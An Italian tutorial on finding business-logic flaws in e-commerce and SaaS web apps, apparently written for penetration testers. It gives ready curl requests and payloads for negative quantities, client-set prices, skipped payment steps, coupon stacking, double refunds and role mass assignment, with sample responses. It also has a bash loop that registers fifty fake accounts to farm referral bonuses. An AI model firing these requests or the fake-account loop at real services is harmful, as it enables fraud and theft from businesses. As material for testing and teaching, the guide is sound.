Business Logic Flaw: Cos’è e Come Trovarlo

# Prima di cercare bug, capisci come funziona il business:
# 1. Registrazione → Profilo → Upgrade piano
# 2. Catalogo → Carrello → Coupon → Pagamento → Conferma → Spedizione
# 3. Referral → Invito → Registrazione invitato → Bonus
# 4. Wallet → Ricarica → Trasferimento → Prelievo

# Per ogni flusso, chiediti:
# - Cosa succede se salto uno step?
# - Cosa succede se inverto l'ordine?
# - Cosa succede se ripeto uno step?
# - Cosa succede con valori 0, -1, 999999999?
# - Cosa succede se cambio un parametro dopo il pagamento?

# Per ogni input numerico nell'applicazione:
# Quantità: 0, -1, -1000, 0.5, 0.001, 999999999, 2147483647 (INT_MAX)
# Prezzo: 0, 0.01, -100, 99999999
# Importo trasferimento: 0, -500, saldo+1, saldo×2

# Per ogni input stringa con vincoli:
# Campo email: formato invalido, lunghezza massima, caratteri speciali
# Codice coupon: vuoto, già usato, scaduto, maiuscolo/minuscolo, con spazi

# In Burp Proxy → intercetta ogni request del flusso di acquisto:
# 1. Aggiungi al carrello → il prezzo è nella request? Modificabile?
# 2. Applica coupon → il discount è calcolato client-side o server-side?
# 3. Checkout → il totale nella request corrisponde a quello calcolato?
# 4. Conferma → l'ordine ID è sequenziale? Prevedibile?

# Cerca discrepanze tra:
# - Cosa mostra il frontend
# - Cosa viene inviato nella request
# - Cosa salva il backend

# Il flusso previsto: Step1 → Step2 → Step3 → Step4
# Testa:
# Step1 → Step4 (salti Step2 e Step3)
# Step1 → Step2 → Step1 → Step3 → Step4 (ripeti Step1)
# Step4 direttamente (senza Step1-3)
# Step1 → Step3 → Step2 → Step4 (ordine invertito)

# In pratica:
curl -X POST "https://target.com/api/order/confirm" \
  -H "Cookie: session=abc" \
  -d '{"order_id": "12345"}'
# L'ordine si conferma senza pagamento? Senza indirizzo?

# === Quantità negativa ===
POST /api/cart/add {"product_id": 42, "quantity": -5}
# Subtotale: 999 × -5 = -4995 → il carrello ha un totale negativo
# Al checkout: il sistema accredita 4995€ invece di addebitare?

# === Prezzo nel body della request ===
POST /api/cart/add {"product_id": 42, "quantity": 1, "price": 0.01}
# Se il backend usa il prezzo dalla request invece che dal database → 0.01€!

# === Integer overflow ===
POST /api/cart/add {"product_id": 42, "quantity": 2147483647}
# 999 × 2147483647 = overflow su INT32 → il totale diventa negativo

# === Arrotondamento ===
POST /api/cart/add {"product_id": 42, "quantity": 1, "price": 99.999}
# 99.999 arrotondato a 99.99 dal sistema di pagamento
# 100.00 - 99.99 = 0.01€ di differenza per transazione
# × 100.000 transazioni = 1.000€ di profitto
# Salami attack: piccolissime differenze di arrotondamento accumulate

# === Cambio valuta ===
# Se l'app supporta più valute:
POST /api/cart/add {"product_id": 42, "currency": "VND"}
# Prezzo in VND (Vietnamese Dong) = 250.000 VND ≈ 9€
# Ma il sistema addebita 250.000 × rate EUR? O il valore numerico grezzo?

# Flusso e-commerce:
# Step 1: Seleziona prodotto  → POST /api/order/items
# Step 2: Indirizzo           → POST /api/order/address
# Step 3: Spedizione          → POST /api/order/shipping
# Step 4: Pagamento           → POST /api/order/pay
# Step 5: Conferma            → POST /api/order/confirm

# Test: vai diretto allo Step 5:
curl -X POST "https://target.com/api/order/confirm" \
  -H "Cookie: session=abc123" \
  -d '{"order_id": "12345"}'
# Se risponde 200 → ordine confermato senza pagamento!

# Test: salta lo Step 3 (spedizione):
# Fai Step 1 → Step 2 → Step 4 → Step 5
# Spedizione gratuita perché mai selezionata?

# Test: ripeti Step 4 con importo diverso:
POST /api/order/pay {"amount": 0.01, "order_id": "12345"}
# Il backend verifica che l'importo pagato corrisponda al totale?

# === Coupon stacking ===
POST /api/cart/apply-coupon {"code": "SCONTO20"}   # -20%
POST /api/cart/apply-coupon {"code": "BENVENUTO10"} # -10%
POST /api/cart/apply-coupon {"code": "SUMMER15"}    # -15%
# Il sistema accetta più coupon? Totale: 100% - 20% - 10% - 15% = 55%?

# === Coupon su prezzo scontato ===
# Prodotto: 100€ in saldo al 50% → 50€
# Coupon 20%: applicato su 50€ → 40€ (sconto totale 60%)

# === Coupon + gift card loop ===
# 1. Compra gift card da 100€ → applica coupon 20% → paga 80€
# 2. Riscatta gift card → saldo 100€
# 3. Profitto: 20€. Ripeti.

# === Coupon dopo pagamento ===
# Paga 100€ → poi applica coupon → il sistema ricalcola e rimborsa?

# === Case sensitivity ===
POST /api/cart/apply-coupon {"code": "sconto50"}    # lowercase
POST /api/cart/apply-coupon {"code": "SCONTO50"}    # uppercase
# Se entrambi funzionano → lo stesso coupon con case diverso = doppio uso?

# === Coupon scaduto con timestamp manipulation ===
# Se il frontend invia la data corrente:
POST /api/cart/apply-coupon {"code": "OLD50", "timestamp": "2025-01-01T00:00:00Z"}
# Il backend usa il timestamp del client per la verifica scadenza?

# "Invita un amico → ricevi 10€"

# Self-referral:
# 1. Crea account con email temporanea (guerrillamail, tempmail)
# 2. Registra l'account fake col tuo codice referral
# 3. Ricevi 10€. Ripeti con email diverse.

# Verifica i controlli:
# ☐ L'email deve essere verificata?
# ☐ Serve una transazione minima dall'invitato?
# ☐ Lo stesso IP/device può creare più account?
# ☐ Lo stesso numero di telefono è richiesto?
# ☐ User-agent/fingerprint controllati?

# Script automatico:
for i in $(seq 1 50); do
  email="fakuser${i}@tempmail.com"
  curl -s -X POST "https://target.com/api/register" \
    -d "{\"email\":\"$email\",\"password\":\"Test123!\",\"referral\":\"MY_CODE\"}"
  echo "[+] Registered $email with referral"
done
# 50 registrazioni × 10€ = 500€ di bonus

# === Upgrade senza pagamento ===
PUT /api/account/plan {"plan": "enterprise"}
# Il backend verifica il pagamento? O accetta il campo?

# === Mass Assignment su ruolo ===
PUT /api/users/me {"name": "Mario", "role": "admin"}
# Il campo "role" è filtrabile? La v1 dell'API lo filtra?

# === Downgrade con accesso mantenuto ===
# Attiva trial Premium → accedi a tutte le feature → fai downgrade a Free
# Le feature premium sono ancora accessibili?
# I dati scaricati durante il trial restano disponibili?

# === Free tier abuse ===
# "Piano Free: 100 API call/mese"
# Il limite è hard (429 dopo 100) o soft (warning)?
# Crea 10 account Free → 1000 API call/mese gratis

# === Rimborso doppio ===
POST /api/orders/12345/refund          # Rimborso 1 → 100€
POST /api/orders/12345/refund          # Rimborso 2 → altri 100€?
# Il sistema verifica che l'ordine sia già stato rimborsato?

# === Modifica ordine post-pagamento ===
# Paga ordine con prodotto da 10€
PUT /api/orders/12345 {"product_id": 999}   # Cambia a prodotto da 1000€
# Il sistema permette la modifica dopo il pagamento?

# === Annullamento parziale ===
# Ordine: 5 prodotti × 20€ = 100€. Paga 100€.
# Annulla 4 prodotti → rimborso 80€
# Il quinto viene spedito → pagato 20€ per un singolo prodotto
# Ma il prezzo singolo era 25€ (sconto volume) → hai pagato meno

$ curl -s -X POST "https://target.com/api/cart/add" \
  -H "Cookie: session=abc123" \
  -d '{"product_id": 42, "quantity": -3}' | python3 -m json.tool

{"cart": {"items": [{"product":"Laptop","quantity":-3,"price":999,"subtotal":-2997}], "total":-2997.00}}

$ curl -s -X POST "https://target.com/api/order/pay" \
  -H "Cookie: session=abc123" \
  -d '{"payment_method": "wallet"}'

{"status": "success", "refunded": 2997.00, "wallet_balance": 3497.00}
# → 2997€ accreditati sul wallet da una quantità negativa!

$ curl -s -X POST "https://target.com/api/order/confirm" \
  -H "Cookie: session=abc123" -d '{"order_id": "12345"}'

{"status": "confirmed", "shipping": "in_progress"}
# → Ordine confermato e spedito SENZA pagamento!